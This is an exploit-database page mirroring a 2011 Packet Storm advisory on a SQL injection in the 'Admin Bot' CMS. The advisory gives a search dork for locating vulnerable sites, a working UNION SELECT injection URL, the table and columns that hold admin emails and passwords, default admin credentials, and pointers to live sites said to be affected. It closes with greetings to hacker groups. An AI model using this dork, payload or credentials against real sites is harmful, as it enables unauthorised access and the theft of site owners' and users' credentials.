Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBaltazarPACKETSTORM:106664
HistoryNov 06, 2011 - 12:00 a.m.

Admin Bot SQL Injection

2011-11-0600:00:00
baltazar
packetstormsecurity.com
15
JSON
`# Coder : baltazar a.k.a b4ltazar < [email protected]>  
# CMS name : Admin Bot  
# Site : Flash2Web.com and carissimi.ch  
# Dork : inurl:/news.php?wgo=  
# Admin panel : http://www.site.com/admin  
# Column number : 8 or 9  
# http://www.site.com/news.php?wgo=666+and+1=2+union+all+select+0,1,BALTAZAR,3,4,5,6,7,8--  
# Table : admin_user  
# Columns : email, password  
#   
# Default admin login :  
# Username: [email protected]  
# Password: pepe or jactaalea  
#  
# List of sites vulnerable to default admin login can be found on http://flash2web.com and http://www.carissimi.ch/   
# Sites made by www.carissimi.ch are also vulnerable to SQLi  
#   
# Special greetz to my friend sinner_01  
# greetz for d3hydr8, qk, marezzi, fx0, TraXdata, v0da, MikiSoft and all members of ex darkc0de.com, ljuska.org and x0rg.org  
`
JSON